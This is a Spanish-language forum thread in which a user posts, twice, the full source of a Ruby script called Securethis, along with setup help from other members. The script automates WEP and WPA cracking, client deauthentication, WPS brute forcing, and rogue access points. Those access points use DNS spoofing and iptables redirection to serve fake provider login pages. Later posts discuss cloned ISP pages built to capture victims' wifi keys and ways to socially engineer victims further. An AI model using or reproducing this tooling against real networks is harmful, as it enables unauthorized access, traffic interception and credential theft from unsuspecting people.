Título: Re:Securethis V1.0
Publicado por: cenomeno1 en Abril 13, 2013, 14:45:29 pm
osea el código de selecciono lo pego en la  consola que abro  seguida mente de susus comando no
Título: Re:Securethis V1.0
Publicado por: kcdtv en Abril 13, 2013, 14:54:39 pm
  Antes de lanzarte en esto tienes que leer y familiarizarte con linux.  ;)
  [Ruby] – Comenzando con el Lenguaje Intérprete de moda
 
Título: Re:Securethis V1.0
Publicado por: cenomeno1 en Abril 13, 2013, 15:38:23 pm
ok muchas gracias boi a leerlo lo que dice algo de ubuntu yo en mi caso n uso ubunto pero dara igual no
Título: Re:Securethis V1.0
Publicado por: kcdtv en Abril 13, 2013, 15:49:57 pm
Si usas una distribución basada en debian (altamente aconsejado) no habrá problemas (Kali, backtrack, ubuntu, debian, xubuntu, linux mint etc...)
Sino tendrás que instalar las dependencias a mano
Título: Re:Securethis V1.0
Publicado por: cenomeno1 en Abril 13, 2013, 19:16:58 pm
ok muchas gracias voy ha probar si soy capaz de ponerlo en marcha 
Título: Re:Securethis V1.0
Publicado por: carton968 en Abril 13, 2013, 20:00:30 pm
Podeis subir otra vez las pagina de fileserve que se han caído?? Gracias
Título: Re:Securethis V1.0
Publicado por: koala63 en Abril 15, 2013, 18:24:16 pm
Hola  ;)

Probando autra cosa usando el script me ha dado cuenta que he hecho un error, en la linea 135 del script (abre con gedit o otro) hay que escribir:

def wparlocal
he puesto "wpalocal" antes...


Título: Re:Securethis V1.0
Publicado por: koala63 en Abril 17, 2013, 03:15:19 am
Actualization del script Securethis.rb con una vidéo de explication para los que empiezan en linux.  8)

Código: [Seleccionar]
#!/usr/bin/env ruby
# encoding: utf-8

require "rubygems"
require "highline/import"

puts "Make a good choice with airodump and press ctrl+c for next step"
sleep 10
system ("airmon-ng start wlan0")
sleep 5
system ("airodump-ng mon0")

def wepinj
system ("ifconfig")
      puts "Now choose your MAC adress and press enter, warning to write as well the adress!"
mac=""
mac=gets.chomp
$mac=mac

puts "Le scan de reseau va se lancer, choisissez votre reseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wep mon0")
     puts "Rentrez un nom pour le fichier de capture"
nom=""
nom=gets.chomp
$nom=nom

     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid


system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -1 30 -e #{$essid} -a #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 5
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 1800
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -P 1 #{$nom}-01.cap &> /dev/null &")
end

def wepp
system ("ifconfig")
      puts "Now choose your MAC adress and press enter, warning to write as well the adress!"
mac=""
mac=gets.chomp
$mac=mac

puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wep mon0")
     puts "Rentrez un nom pour le fichier de capture"
nom=""
nom=gets.chomp
$nom=nom

     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid


system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -1 30 -e #{$essid} -a #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 5
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 1800
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -P 1 #{$nom}-01.cap &> /dev/null &")
end

def wpadico
  puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wpa mon0")
     puts "Rentrez un nom pour le fichier de capture"
nom=""
nom=gets.chomp
$nom=nom

     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

     puts "Rentrez l'adresse de la personne connecte au reseau (STATION)"
station=""
station=gets.chomp
$station=station


system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -0 150 -a #{$bssid} -c #{$station} mon0 &> /dev/null &")
sleep 148
puts "Entrez le nom du dico a utiliser"
dico=""
dico=gets.chomp
$dico=dico

system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -w #{$dico} #{$nom}.cap &> /dev/null &")
end

def wparlocal
  puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wpa mon0")
     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch


     puts "Creation de la rogue AP"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -e #{$essid} mon0 &> /dev/null &")
sleep 3
`ifconfig at0 up`
`ifconfig at0 10.0.0.1 netmask 255.255.255.0`
`ifconfig at0 mtu 1400`
`echo > dhcpd.leases`
`iptables --flush`
`iptables --table nat --flush`
`iptables --delete-chain`
`iptables --table nat --delete-chain`
`route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 &> /dev/null`
`iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 10.0.0.1`
`iptables -P FORWARD ACCEPT`
`iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1:80`
     puts "Regles iptables effectues, redemarrage de dhcp3"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &")
     puts "Mise en place de apache et dnsspoof"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo service apache2 restart &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &")
     puts "lancement de wireshark"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e wireshark &> /dev/null &")
end

def wparinternet
  puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wpa mon0")
     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch


     puts "Creation de la rogue AP"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -e #{$essid} mon0 &> /dev/null &")
sleep 3
`ifconfig at0 up`
`ifconfig at0 10.0.0.1 netmask 255.255.255.0`
`ifconfig at0 mtu 1400`
`echo > dhcpd.leases`
`iptables --flush`
`iptables --table nat --flush`
`iptables --delete-chain`
`iptables --table nat --delete-chain`
`iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE`
     puts "Regles iptables effectues, redemarrage de dhcp3"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &")
     puts "Mise en place de apache et dnsspoof"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo service apache2 restart &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e wireshark &> /dev/null &")
end

def wps
puts("Reaver with ten seconds between two request on the acces point.WARNING if reaver is not installed yet in the system you have to go here: http://www.linuxtrack.com/t1427-Installer-Reaver-sur-Ubuntu.htm  and follow the instructions")
sleep 20

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e reaver -i mon0 #{$bssid} -d 10 -vv &> /dev/null &")
end

def sergio
puts("MAKE SURE THE FORWADING IS ENABLED (echo 1 > /proc/sys/net/ipv4/ip_forward)   Sergio is a powerful proxy open source and easy to use for capture any traffic in the web! for more information and download go to https://code.google.com/p/sergio-proxy/ special thanks to Antares145 and his tuto, can be found here: http://antaresnotebook.wordpress.com/2013/03/31/tuto-rogue-ap-episode-2-sniffing-de-base-et-un-peu-de-fun/")
sleep 40
system ("ifconfig")
     puts "Enter your ip adress"
ip=""
ip=gets.chomp
ip=ip

`iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to #{$ip}:10000`
Dir.chdir '/root/sergio/sergio-proxy'
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e ./sergio-proxy.py -l 10000 -w /tmp/log.txt &> /dev/null &")
end

def hostapd
  puts("Hostapd access point mode, good to do a MITM more discreet (make sure your hostapd.conf has got a good configuration and the way to the folder is correct. to begin, remove the line driver=hostapd and replace it with driver=nl80211)")
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e hostapd /etc/hostapd/hostapd.conf &> /dev/null &")
end

def deauth
  system ("ifconfig")
  puts("choose your network card to do the deauth (press enter if you want to use the same card as the rogue AP)")
carte=""
carte=gets.chomp
$carte=carte

system ("airmon-ng start #{$carte}")
sleep 6
system ("airodump-ng --encrypt wpa mon0")
puts("enter the channel of the target network (CH)")
canal=""
canal=gets.chomp
$canal=canal

puts("enter the adress of the target network (BSSID)")
bssid=""
bssid=gets.chomp
$bssid=bssid

puts("enter the name of the file capture in airodump")
name=""
name=gets.chomp
$name=name

system("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng --#{$canal} --#{$essid} --output-format csv -w #{$name} mon0 &> /dev/null &")
sleep 5
system("xterm -hold -bg '#000000' -fg '#3A94FF' -e airdrop-ng -i mon0 -t #{$name}.csv -r /root/rules.txt -b -p &> /dev/null &")
end

def planque
  puts "Airbase can find a hidden network too, you have to wait a little and the network will appear in your airodump-ng windows"
sleep 15
system("airodump-ng --encrypt wpa mon0")
puts "Select the channel of the target network (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Select the bssid of the target network (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

system("airodump-ng -c #{$ch} --bssid #{$bssid} mon0")

     puts "Rogue access point with parameters of the hidden network is in active mode, see airodump and wait for the name of this network"
sleep 10
system("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -a #{$bssid} -X mon0 &> /dev/null &")
end

def metasploit
    puts "BEFORE Lauching metasploit if you are on unbutu or other linux plateform make sure you have all the librairies to run properly metasploit.Lauching msfconsole, this could take a time...wait.Come back to Securethis menu pressing exit in msfconsole"
sleep 20
system("msfconsole")
end

def clean
    puts "Remove your index.html and php and all css present into /var/www and replace with the new files you choose CTRL+C TO ABORT NOW!"
sleep 20
`rm /var/www/index.php`
`rm /var/www/index.html`
`rm /var/www/valid.php`
`rm /var/www/*.css`
`rm /var/www/*.jpg`
`rm /var/www/*.ico`

puts "Now enter the name of your folder wich countain the fakes pages"
name=""
name=gets.chomp
$name=name

Dir.chdir '/root'
`cp -rv #{$name} /var/www`
end

def settings
  puts "CHECK and EDIT: Important file needed for a good crack"
sleep 10
`gedit /etc/dhcp3/dhcpd.conf`
`gedit /root/dns.txt`
`gedit /etc/hostapd/hostapd.conf`
`gedit /root/rules.txt`
`gedit /var/log/apache2/access.log`
`gedit /var/log/apache2/error.log`
end

begin
  puts
  loop do
    choose do |menu|
      menu.prompt = "Please select option"
  puts "##################    Coded By Flow (Koala)              #################"
  puts "##################    Securethis V1.1                    #################"
  puts "                  #########################                   "
  puts "                        #############                         "
  puts "                            #####                             "
  puts "                              #                               "
  puts "~~~Does your network is secure?~~~                            "
 
      menu.choice(:Wepinjection, "injection.") { wepinj() }
      menu.choice(:Wepp0841, "-p0841.") { wepp() }
      menu.choice(:Wpabruteforce, "attaque par dico.") { wpadico() }
      menu.choice(:RogueAPlocal, "Rogue local seulement.") { wparlocal() }
      menu.choice(:RogueAPinternet, "Rogue avec internet.") { wparinternet() }
      menu.choice(:ReaverWPS, "Reaver.") { wps() }
      menu.choice(:Sniffing, "Utilisation de Sergio proxy.") { sergio() }
      menu.choice(:Hostapd, "Hostapd.") { hostapd() }   
      menu.choice(:DeauthAttack, "airdrop-ng.") { deauth() }
      menu.choice(:HiddenNetwork, "reseau caché.") { planque() }
      menu.choice(:Metasploit, "lancement de msfconsole.") { metasploit() }
      menu.choice(:CleanApache2WARNING, "supprime les fichier du crack.") { clean() }
      menu.choice(:Settings, "Boite a outils.") { settings() }
      menu.choice(:Quit, "Quitter le prog.") { exit }
    end
  end
end


La vidéo de explication http://www.dailymotion.com/user/Insidebinary/1#video=xz2kbj

Tendras mi configuracion dhcp dns.txt etc tambien sigiendo la vidéo  ;)

Hare mas explicacion la proxima vez con sergio proxy, no he visto el tiempo passar haciendo la vidéo y queria bien explicar todo.

Ahora no teneis excusas para nada  teneis que hacer bien esta tonta de rogue AP  :P
Título: Re:Securethis V1.0
Publicado por: 1camaron1 en Abril 17, 2013, 09:29:23 am
Gracias ;)  el de sergio-proxy es muy interesante.
Saludos
Título: Re:Securethis V1.0
Publicado por: sylents en Agosto 31, 2013, 02:44:35 am
Hola la funcion rouge ap no funciona en kali linux e intentado modificar el archivo ya que creo que en kali el dhcp3 es dhcp-server.Un saludo el dnsspoof no me va tampoco.Gracias por tu ayuda.
Título: Re:Securethis V1.0
Publicado por: koala63 en Agosto 31, 2013, 08:19:35 am
Hola  ;)


El programmo esta hecho para unbutu en primero porque soy usando mucho mas unbutu que bactrack  ;)

Título: Re:Securethis V1.0
Publicado por: longyny en Octubre 22, 2013, 20:05:17 pm
Sigue vivo este hilo? Alguien podría resubir los archivos o recomentar algun otro script o tutorial ??
Título: Re:Securethis V1.0
Publicado por: kcdtv en Octubre 22, 2013, 20:22:31 pm
Si no esta cerrado y que puedes postear es que esta vivo  ;)
No hay descargas, copias el código y lo guardas en un fichero de texto simple que llamas Securethis.rb y ejecutas el script.
Título: Re:Securethis V1.0
Publicado por: longyny en Octubre 22, 2013, 20:24:26 pm
Ya, pero y las webs clonadas?
Título: Re:Securethis V1.0
Publicado por: kcdtv en Octubre 22, 2013, 20:50:55 pm
GIMP :P
pues koala se pasra por ahi un día, lo suyo si no sabes hacer fake es que subes un modelo.
Título: Re:Securethis V1.0
Publicado por: cristi_28 en Octubre 23, 2013, 02:01:33 am
no se en lugar de webs clonadas me parece mas credible esto

(http://img23..us/img23/5466/4jo3.png)
Título: Re:Securethis V1.0
Publicado por: rubenn93 en Octubre 23, 2013, 11:34:33 am
el link esta caido  :-\
Título: Re:Securethis V1.0
Publicado por: guest48471 en Octubre 24, 2013, 12:21:04 pm
ola a todos me interesa esto pero vale para wifislax 4.6 y si es asin como lo abro ahi grasias
Título: Re:Securethis V1.0
Publicado por: koala63 en Noviembre 10, 2013, 01:39:54 am
Hola :)

No tengo mucho tiempo para hacer pahinas clonadas PERO voy a dar la spahinas que he hecho yo y a ver si uno me ayuda a terminar bien todo eso.Son pahinas para red en Francia pero hay Orange y bouygues y sfr (vodafone en espana ? )


Hay mas cosas a hacer en esas pahinas porque como no tengo mucho tiempo no estan completa, ejemplo:

-1   La ayuda en linea con una shoutbox para hablar directamente con la victima tienne necessidad de ayuda.
-2    Espaso privado con un autra pahina que pide los codigos para tener un acesso en la configuration de la box a distancia o hacer el "social engeneering" llamando la hotline para buscar mas information.
-3    Cambiar la imagen "aide.jpg" (las colores y el escrito Livebox-1234)
-4    Hacer nuevo codigo CSS mas facil y mejor para que los nuevos pueden apprender y cambiar cosas a dentro.

NO se NECESSITA usar wireshark con esas pahinas, quatro linea de PHP mas y un nuevo txt se hace cuando el usario entra su llave  wifi ;)


Ahora el link de las pahinas:

http://uptobox.com/pa7a1hghj4b5

Y el Securethis.rb que uso en unbutu 12.04LTS (no se necessita de descargar lo si tiennes una version antérior o igual que unbutu 10.04)

Código: [Seleccionar]
#!/usr/bin/env ruby
# encoding: utf-8

require "rubygems"
require "highline/import"

puts "Make a good choice with airodump and press ctrl+c for next step"
sleep 10
system ("airmon-ng start wlan0")
sleep 5
system ("airodump-ng mon0")

def wepinj
system ("ifconfig")
      puts "Now choose your MAC adress and press enter, warning to write as well the adress!"
mac=""
mac=gets.chomp
$mac=mac

puts "Le scan de reseau va se lancer, choisissez votre reseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wep --ignore-negative-one mon0")
     puts "Rentrez un nom pour le fichier de capture"
nom=""
nom=gets.chomp
$nom=nom

     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid


system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} --ignore-negative-one mon0 &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -1 30 -e #{$essid} -a #{$bssid} -h #{$mac} --ignore-negative-one mon0 &> /dev/null &")
sleep 5
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b #{$bssid} -h #{$mac} --ignore-negative-one mon0 &> /dev/null &")
sleep 1800
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -P 1 #{$nom}-01.cap &> /dev/null &")
end

def wepp
system ("ifconfig")
      puts "Now choose your MAC adress and press enter, warning to write as well the adress!"
mac=""
mac=gets.chomp
$mac=mac

puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wep --ignore-negative-one mon0")
     puts "Rentrez un nom pour le fichier de capture"
nom=""
nom=gets.chomp
$nom=nom

     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid


system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} --ignore-negative-one mon0 &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -1 30 -e #{$essid} -a #{$bssid} -h #{$mac} --ignore-negative-one mon0 &> /dev/null &")
sleep 5
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b #{$bssid} -h #{$mac} --ignore-negative-one mon0 &> /dev/null &")
sleep 1800
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -P 1 #{$nom}-01.cap &> /dev/null &")
end

def wpadico
  puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wpa --ignore-negative-one mon0")
     puts "Rentrez un nom pour le fichier de capture"
nom=""
nom=gets.chomp
$nom=nom

     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

     puts "Rentrez l'adresse de la personne connecte au reseau (STATION)"
station=""
station=gets.chomp
$station=station


system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} --ignore-negative-one mon0 &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -0 150 -a #{$bssid} -c #{$station} --ignore-negative-one mon0 &> /dev/null &")
sleep 148
puts "Entrez le nom du dico a utiliser"
dico=""
dico=gets.chomp
$dico=dico

system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -w #{$dico} #{$nom}.cap &> /dev/null &")
end

def wparlocal
  puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wpa --ignore-negative-one mon0")
     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch


     puts "Creation de la rogue AP"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -e #{$essid} mon0 &> /dev/null &")
sleep 3
`ifconfig at0 up`
`ifconfig at0 10.0.0.1 netmask 255.255.255.0`
`ifconfig at0 mtu 1400`
`echo > dhcpd.leases`
`iptables --flush`
`iptables --table nat --flush`
`iptables --delete-chain`
`iptables --table nat --delete-chain`
`route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 &> /dev/null`
`iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 10.0.0.1`
`iptables -P FORWARD ACCEPT`
`iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1:80`
     puts "Regles iptables effectues, redemarrage de dhcp3"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &")
     puts "Mise en place de apache et dnsspoof"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo service apache2 restart &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &")
     puts "lancement de wireshark, ITS NOT NECESSARY close it if you have a php script in your fake page"
sleep 6
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e wireshark &> /dev/null &")
end

def wparinternet
  puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wpa --ignore-negative-one mon0")
     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch


     puts "Creation de la rogue AP"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -e #{$essid} mon0 &> /dev/null &")
sleep 3
`ifconfig at0 up`
`ifconfig at0 10.0.0.1 netmask 255.255.255.0`
`ifconfig at0 mtu 1400`
`echo > dhcpd.leases`
`iptables --flush`
`iptables --table nat --flush`
`iptables --delete-chain`
`iptables --table nat --delete-chain`
`iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE`
     puts "Regles iptables effectues, redemarrage de dhcp3"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &")
     puts "Mise en place de apache et dnsspoof"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo service apache2 restart &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &")
sleep 3
puts "lancement de wireshark, ITS NOT NECESSARY close it if you have a php script in your fake page"
sleep 6
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e wireshark &> /dev/null &")
end

def wps
puts("Reaver with ten seconds between two request on the acces point.WARNING if reaver is not installed yet in the system you have to go here: http://www.linuxtrack.com/t1427-Installer-Reaver-sur-Ubuntu.htm  and follow the instructions")
sleep 20

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e reaver -i mon0 #{$bssid} -d 10 -vv &> /dev/null &")
end

def sergio
puts("MAKE SURE THE FORWADING IS ENABLED (echo 1 > /proc/sys/net/ipv4/ip_forward)   Sergio is a powerful proxy open source and easy to use for capture any traffic in the web! for more information and download go to https://code.google.com/p/sergio-proxy/ special thanks to Antares145 and his tuto, can be found here: http://antaresnotebook.wordpress.com/2013/03/31/tuto-rogue-ap-episode-2-sniffing-de-base-et-un-peu-de-fun/")
sleep 40
system ("ifconfig")
     puts "Enter your ip adress"
ip=""
ip=gets.chomp
ip=ip

`iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to #{$ip}:10000`
Dir.chdir '/root/sergio/sergio-proxy'
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e ./sergio-proxy.py -l 10000 -w /tmp/log.txt &> /dev/null &")
end

def hostapd
  puts("Hostapd access point mode, good to do a MITM more discreet (make sure your hostapd.conf has got a good configuration and the way to the folder is correct. to begin, remove the line driver=hostapd and replace it with driver=nl80211)")
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e hostapd /etc/hostapd/hostapd.conf &> /dev/null &")
end

def deauth
  system ("ifconfig")
  puts("choose your network card to do the deauth (press enter if you want to use the same card as the rogue AP)")
carte=""
carte=gets.chomp
$carte=carte

system ("airmon-ng start #{$carte}")
sleep 6
system ("airodump-ng --encrypt wpa --ignore-negative-one mon0")
puts("enter the channel of the target network (CH)")
canal=""
canal=gets.chomp
$canal=canal

puts("enter the adress of the target network (BSSID)")
bssid=""
bssid=gets.chomp
$bssid=bssid

puts("enter the name of the file capture in airodump")
name=""
name=gets.chomp
$name=name

system("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng --#{$canal} --#{$essid} --output-format csv -w #{$name} mon0 &> /dev/null &")
sleep 5
system("xterm -hold -bg '#000000' -fg '#3A94FF' -e airdrop-ng -i mon0 -t #{$name}.csv -r /root/rules.txt -b -p &> /dev/null &")
end

def planque
  puts "Airbase can find a hidden network too, you have to wait a little and the network will appear in your airodump-ng windows"
sleep 15
system("airodump-ng --encrypt wpa mon0")
puts "Select the channel of the target network (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Select the bssid of the target network (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

system("airodump-ng -c #{$ch} --bssid #{$bssid} mon0")

     puts "Rogue access point with parameters of the hidden network is in active mode, see airodump and wait for the name of this network"
sleep 10
system("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -a #{$bssid} -X mon0 &> /dev/null &")
end

def metasploit
    puts "BEFORE Lauching metasploit if you are on unbutu or other linux plateform make sure you have all the librairies to run properly metasploit.Lauching msfconsole, this could take a time...wait.Come back to Securethis menu pressing exit in msfconsole"
sleep 20
system("msfconsole")
end

def clean
    puts "Remove your index.html and php and all css present into /var/www and replace with the new files you choose CTRL+C TO ABORT NOW!"
sleep 20
`rm /var/www/index.php`
`rm /var/www/index.html`
`rm /var/www/valid.php`
`rm /var/www/*.css`
`rm /var/www/*.jpg`
`rm /var/www/*.ico`

puts "Now enter the name of your folder wich countain the fakes pages"
name=""
name=gets.chomp
$name=name

Dir.chdir '/root'
`cp -rv #{$name} /var/www`
end

def settings
  puts "CHECK and EDIT: Important file needed for a good crack"
sleep 10
`gedit /etc/dhcp3/dhcpd.conf`
`gedit /root/dns.txt`
`gedit /etc/hostapd/hostapd.conf`
`gedit /root/rules.txt`
`gedit /var/log/apache2/access.log`
`gedit /var/log/apache2/error.log`
end

begin
  puts
  loop do
    choose do |menu|
      menu.prompt = "Please select option"
  puts "##################    Coded By Flow (Koala)              #################"
  puts "##################    Securethis V1.1                    #################"
  puts "                  #########################                   "
  puts "                        #############                         "
  puts "                            #####                             "
  puts "                              #                               "
  puts "~~~Does your network is secure?~~~                            "
 
      menu.choice(:Wepinjection, "injection.") { wepinj() }
      menu.choice(:Wepp0841, "-p0841.") { wepp() }
      menu.choice(:Wpabruteforce, "attaque de bruteforce.") { wpadico() }
      menu.choice(:RogueAPlocal, "Rogue sin internet.") { wparlocal() }
      menu.choice(:RogueAPinternet, "Rogue con internet.") { wparinternet() }
      menu.choice(:ReaverWPS, "Reaver.") { wps() }
      menu.choice(:Sniffing, "Usando de Sergio proxy.") { sergio() }
      menu.choice(:Hostapd, "Hostapd.") { hostapd() }   
      menu.choice(:DeauthAttack, "airdrop-ng.") { deauth() }
      menu.choice(:HiddenNetwork, "red escondido.") { planque() }
      menu.choice(:Metasploit, "lancamiento de msfconsole.") { metasploit() }
      menu.choice(:CleanApache2WARNING, "Limpiar su apache") { clean() }
      menu.choice(:Settings, "Caja de outilla.") { settings() }
